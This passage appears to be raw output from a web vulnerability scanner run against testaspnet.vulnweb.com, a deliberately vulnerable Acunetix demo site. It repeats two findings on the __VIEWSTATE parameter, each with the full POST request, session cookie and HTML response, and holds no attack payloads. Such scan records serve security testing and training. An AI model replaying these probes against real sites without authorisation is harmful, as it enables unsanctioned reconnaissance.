style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8438&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDAgkGeCNsIZGRkMix0qZVusGFTXv%2BZQ5jN0ORSOmE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLTit2ZCgLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBb%2BPxrBGLujFze%2F9L8JDk91gPsGH
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:25 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDAgkGeCNsIZGRkMix0qZVusGFTXv+ZQ5jN0ORSOmE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLTit2ZCgLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBb+PxrBGLujFze/9L8JDk91gPsGH" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:White" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8442&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDAKevCC9sIZGRkW7fUD4kV66zHIpLWH2wCfUQ1x3Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK3s9jMDwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBYn6ihdUtSt4iMO9fGV7U5tf%2FjtG
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:04 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDAKevCC9sIZGRkW7fUD4kV66zHIpLWH2wCfUQ1x3Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK3s9jMDwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBYn6ihdUtSt4iMO9fGV7U5tf/jtG" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:White" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a 